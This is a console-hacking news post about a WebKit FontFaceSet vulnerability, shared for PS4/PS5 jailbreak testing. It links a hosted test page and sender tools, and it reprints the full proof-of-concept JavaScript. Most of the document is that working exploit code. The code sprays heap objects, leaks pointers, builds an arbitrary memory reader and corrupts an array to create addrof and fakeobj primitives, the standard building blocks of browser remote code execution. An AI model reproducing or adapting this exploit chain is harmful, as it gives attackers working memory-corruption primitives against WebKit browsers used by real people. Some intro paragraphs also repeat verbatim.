After last week's barrage of WebKit vulnerabilities including CVE-2021-1879, CVE-2021-30858 with PlayStation 5 Test results, more PS4 & PS5 Testing alongside CVE-2021-30797 developer @sleirsgoevy (Github) shared on Twitter a FontFaceSet Vulnerability Proof-of-Concept (PoC) temporarily hosted for those in the PlayStation 4 Scene to try stating he's "Especially interested in reports from 9.00" PS4 firmware.
As usual, it's currently not advisable to update neither your PS4 nor PS5 consoles... for the latest exploit updates follow the PS4 Jailbreak and PS5 Jailbreak categories.
Here's the FontFaceSet Vulnerability PoC source code from Mega.nz:
- vdsina.sleirsgoevy.dynv6.net:8081 (PoC Test Page) /
sender.exe(133 KB - GIT) by sleirsgoevy (BTW just finished another something-to-browser port. Remote package installation over NetCat! Well, not actually...) / sender.exe (Fixed) (147 KB) / sender.exe (276 KB - bgft-sender.exe updated for GoldHEN loader)
As usual, it's currently not advisable to update neither your PS4 nor PS5 consoles... for the latest exploit updates follow the PS4 Jailbreak and PS5 Jailbreak categories.
Here's the FontFaceSet Vulnerability PoC source code from Mega.nz:
Code:
<script>
var PAGE_SIZE = 4096;
var SIZEOF_CSS_FONT_FACE = 200;
var HASHMAP_BUCKET = 208;
var STRING_OFFSET = 20;
var SPRAY_FONTS = 0x1000;
var GUESS_FONT = 0x7fffc381b000;
var NPAGES = 20;
var INVALID_POINTER = 0;
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)
var HAMMER_NSTRINGS = 700; //tweak this if crashing during hammer time
function poc(){
function hex(n)
{
if((typeof n) != "number")
return ""+n;
return "0x" + (new Number(n)).toString(16);
}
var union = new ArrayBuffer(8);
var union_b = new Uint8Array(union);
var union_i = new Uint32Array(union);
var union_f = new Float64Array(union);
var bad_fonts = [];
for(var i = 0; i < SPRAY_FONTS; i++)
bad_fonts.push(new FontFace("font1", "", {}));
var good_font = new FontFace("font2", "url(data:text/html,)", {});
bad_fonts.push(good_font);
var arrays = [];
for(var i = 0; i < 512; i++)
arrays.push(new Array(31));
arrays[256][0] = 1.5;
arrays[257][0] = {};
arrays[258][0] = 1.5;
var jsvalue = {a: arrays[256], b: new Uint32Array(1), c: true};
var string_atomifier = {};
var string_id = 10000000;
function ptrToString(p)
{
var s = '';
for(var i = 0; i < 8; i++)
{
s += String.fromCharCode(p % 256);
p = (p - p % 256) / 256;
}
return s;
}
function stringToPtr(p, o)
{
if(o === undefined)
o = 0;
var ans = 0;
for(var i = 7; i >= 0; i--)
ans = 256 * ans + p.charCodeAt(o+i);
return ans;
}
var strings = [];
function mkString(l, head)
{
var s = head + '\u0000'.repeat(l-STRING_OFFSET-8-head.length) + (string_id++);
string_atomifier[s] = 1;
strings.push(s);
return s;
}
var p_s = ptrToString(NPAGES+2); // vector.size()
for(var i = 0; i < NPAGES; i++)
p_s += ptrToString(GUESS_FONT + i * PAGE_SIZE);
p_s += ptrToString(INVALID_POINTER);
for(var i = 0; i < 256; i++)
mkString(HASHMAP_BUCKET, p_s);
var ffs = new FontFaceSet(bad_fonts);
var badstr1 = mkString(HASHMAP_BUCKET, p_s);
var guessed_font = null;
var guessed_addr = null;
for(var i = 0; i < SPRAY_FONTS; i++)
{
bad_fonts[i].family = "evil";
if(badstr1.substr(0, p_s.length) != p_s)
{
guessed_font = i;
var p_s1 = badstr1.substr(0, p_s.length);
for(var i = 1; i <= NPAGES; i++)
{
if(p_s1.substr(i*8, 8) != p_s.substr(i*8, 8))
{
guessed_addr = stringToPtr(p_s.substr(i*8, 8));
break;
}
}
break;
}
}
if(badstr1.substr(0, p_s.length) == p_s)
{
alert("failed to guess fontface addr");
return;
}
alert("guessed fontface addr: "+guessed_font+" -> "+hex(guessed_addr));
p_s = '';
p_s += ptrToString(26);
p_s += ptrToString(guessed_addr);
p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
for(var i = 0; i < 19; i++)
p_s += ptrToString(INVALID_POINTER);
for(var i = 0; i < 256; i++)
mkString(HASHMAP_BUCKET, p_s);
var ffs2 = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font+1], good_font]);
var badstr2 = mkString(HASHMAP_BUCKET, p_s);
mkString(HASHMAP_BUCKET, p_s);
bad_fonts[guessed_font].family = "evil2";
bad_fonts[guessed_font+1].family = "evil3";
var leak = stringToPtr(badstr2.substr(badstr2.length-8));
alert("stringimpl leak: "+hex(leak));
var ffses = {};
function makeReader(read_addr, ffs_name)
{
var fake_s = '';
fake_s += '0000'; //padding for 8-byte alignment
fake_s += '\u00ff\u0000\u0000\u0000\u00ff\u00ff\u00ff\u00ff'; //refcount=255, length=0xffffffff
fake_s += ptrToString(read_addr); //where to read from
fake_s += ptrToString(0x80000014); //some fake non-zero hash, atom, 8-bit
p_s = '';
p_s += ptrToString(29);
p_s += ptrToString(guessed_addr);
p_s += ptrToString(guessed_addr + SIZEOF_CSS_FONT_FACE);
p_s += ptrToString(guessed_addr + 2 * SIZEOF_CSS_FONT_FACE);
for(var i = 0; i < 18; i++)
p_s += ptrToString(INVALID_POINTER);
for(var i = 0; i < 256; i++)
mkString(HASHMAP_BUCKET, p_s);
var the_ffs = ffses[ffs_name] = new FontFaceSet([bad_fonts[guessed_font], bad_fonts[guessed_font+1], bad_fonts[guessed_font+2], good_font]);
mkString(HASHMAP_BUCKET, p_s);
var relative_read = mkString(HASHMAP_BUCKET, fake_s);
bad_fonts[guessed_font].family = ffs_name+"_evil1";
bad_fonts[guessed_font+1].family = ffs_name+"_evil2";
bad_fonts[guessed_font+2].family = ffs_name+"_evil3";
if(relative_read.length < 1000) //failed
return makeReader(read_addr, ffs_name+'_');
return relative_read;
}
var fastmalloc = makeReader(leak, 'ffs3'); //read from leaked string ptr
alert("fastmalloc.length = "+fastmalloc.length);
for(var i = 0; i < 0x1000; i++)
mkString(128, '');
var props = [];
for(var i = 0; i < 0x400; i++)
{
props.push({value: 0x41434442});
props.push({value: jsvalue});
}
var jsvalue_leak = null;
while(jsvalue_leak === null)
{
Object.defineProperties({}, props);
for(var i = 0; i < 0x100000; i++)
{
if(fastmalloc.charCodeAt(i) == 0x42
&& fastmalloc.charCodeAt(i+1) == 0x44
&& fastmalloc.charCodeAt(i+2) == 0x43
&& fastmalloc.charCodeAt(i+3) == 0x41
&& fastmalloc.charCodeAt(i+4) == 0
&& fastmalloc.charCodeAt(i+5) == 0
&& fastmalloc.charCodeAt(i+6) == 254
&& fastmalloc.charCodeAt(i+7) == 255
&& fastmalloc.charCodeAt(i+24) == 14
)
{
jsvalue_leak = stringToPtr(fastmalloc, i+32);
break;
}
}
}
alert("jsvalue leak: " + jsvalue + " -> " + hex(jsvalue_leak));
var rd_leak = makeReader(jsvalue_leak, 'ffs4');
var array256 = stringToPtr(rd_leak, 16); //arrays[256]
var ui32a = stringToPtr(rd_leak, 24); //Uint32Array
var sanity = stringToPtr(rd_leak, 32);
alert("array256="+hex(array256)+" ui32a="+hex(ui32a)+" sanity="+hex(sanity));
var rd_arr = makeReader(array256, 'ffs5');
var butterfly = stringToPtr(rd_arr, 8);
var rd_ui32 = makeReader(ui32a, 'ffs6');
for(var i = 0; i < 8; i++)
union_b[i] = rd_ui32.charCodeAt(i);
var structureid_low = union_i[0];
var structureid_high = union_i[1];
alert("butterfly="+hex(butterfly)+" structureid="+structureid_low);
//setup for addrof/fakeobj
//in array[256] butterfly: 0 = &bad_fonts[guessed_font+12] as double
//in array[257] butterfly: 0 = {0x10000, 0x10000} as jsvalue
union_i[0] = 0x10000;
union_i[1] = 0; //account for nan-boxing
arrays[257][1] = {}; //force it to still be jsvalue-array not double-array
arrays[257][0] = union_f[0];
union_i[0] = (guessed_addr + 12 * SIZEOF_CSS_FONT_FACE) | 0;
union_i[1] = (guessed_addr - guessed_addr % 0x100000000) / 0x100000000;
arrays[256][i] = union_f[0];
//hammer time!
pp_s = '';
pp_s += ptrToString(56);
for(var i = 0; i < 12; i++)
pp_s += ptrToString(guessed_addr + i * SIZEOF_CSS_FONT_FACE);
var fake_s = '';
fake_s += '0000'; //padding for 8-byte alignment
fake_s += ptrToString(INVALID_POINTER); //never dereferenced
fake_s += ptrToString(butterfly); //hammer target
fake_s += '\u0000\u0000\u0000\u0000\u0022\u0000\u0000\u0000'; //length=34
var ffs7_args = [];
for(var i = 0; i < 12; i++)
ffs7_args.push(bad_fonts[guessed_font+i]);
ffs7_args.push(good_font);
var ffs8_args = [bad_fonts[guessed_font+12]];
for(var i = 0; i < 5; i++)
ffs8_args.push(new FontFace(HAMMER_FONT_NAME, "url(data:text/html,)", {}));
for(var i = 0; i < HAMMER_NSTRINGS; i++)
mkString(HASHMAP_BUCKET, pp_s);
var ffs7 = new FontFaceSet(ffs7_args);
mkString(HASHMAP_BUCKET, pp_s);
var ffs8 = new FontFaceSet(ffs8_args);
mkString(HASHMAP_BUCKET, fake_s);
for(var i = 0; i < 13; i++)
bad_fonts[guessed_font+i].family = "hammer"+i;
alert("arrays[257].length="+arrays[257].length);
window.addrof = function(obj)
{
arrays[257][32] = obj;
union_f[0] = arrays[258][0];
return union_i[1] * 0x100000000 + union_i[0];
}
window.fakeobj = function(addr)
{
union_i[0] = addr;
union_i[1] = (addr - addr % 0x100000000) / 0x100000000;
arrays[258][0] = union_f[0];
return arrays[257][32];
}
alert("addrof(null)="+addrof(null)+" fakeobj(10)="+fakeobj(10));
}